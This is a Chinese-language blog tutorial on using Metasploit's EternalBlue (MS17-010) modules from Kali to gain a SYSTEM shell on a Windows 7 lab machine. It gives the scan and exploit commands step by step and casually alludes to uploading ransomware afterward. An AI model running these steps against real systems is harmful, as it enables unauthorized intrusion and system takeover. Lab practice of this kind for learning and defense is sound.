kali利用永恒之蓝攻击win7

kali机:192.168.198.134
win7:192.168.198.138
照常来查看一下自己的IP地址
在这里插入图片描述
在这里插入图片描述
接下来就是配置靶机的环境
1.网络连接方式选择公用网络
在这里插入图片描述
2.关闭公用网络的防火墙(否则ping不通靶机)
在这里插入图片描述
现在可以离开win7了
打开我们最可爱的kali,启动我们的msfconsole小可爱
在这里插入图片描述
(msfconsole都是爱你的样子哟)
好的我们来搜索一下永恒之蓝在msf中的编号

search ms17_010 -->搜索msfconsole内所有关于ms17_010的东西

在这里插入图片描述
请看1号选手:

auxiliary/scanner/smb/smb_ms17_010 -->探测永恒之蓝漏洞模块

我们首先用这个命令来探测目标机器是否有永恒之蓝漏洞(当然你不探测也没有关系)

use auxiliary/scanner/smb/smb_ms17_010 -->使用这个模块
show options -->查看所需哪些参数

在这里插入图片描述
我们可以看到RHOSTS和RPORT对应的yes,意为所需的参数
RPORT是445端口,不用管。但RHOSTS是空的,所以我们来设置一下

set RSHOSTS 192.168.198.138 -->设置靶机的主机地址

填好之后就可以开始攻击了

exploit -->攻击

在这里插入图片描述
请看倒数第5排,他给你的解释是:

Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)

译:这个主机可能存在ms17_010漏洞,也就是永恒之蓝漏洞

既然有漏洞了,那么我们开始吧
可是要怎么开始呢
大家还记得上面的search ms17_010么,移步图6,找到我们的2号选手

exploit/windows/smb/ms17_010_eternalblue -->永恒之蓝攻击模块
use exploit/windows/smb/ms17_010_eternalblue -->使用永恒之蓝攻击模块

在这里插入图片描述
老方法,查看所需参数:show options
在这里插入图片描述
设置RHOSTS参数并攻击

set RHOSTS 192.168.198.138 -->设置靶机的主机地址
exploit -->攻击

在这里插入图片描述
当出现最下面WIN字眼时,证明你已经攻击成功了
它是不会动的,你千万不要以为它卡住了哦
你得按一下回车,就会进入cmd模式了
在这里插入图片描述
查看自己的权限,是系统权限

好的,下面上传勒索软件我就不讲了,我们就以拿到系统权限为目的

还是老话,有什么不懂的欢迎私信
如果我有哪点没讲清楚的,欢迎评论

  • 26
    点赞
  • 149
    收藏
    觉得还不错? 一键收藏
  • 19
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 19
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值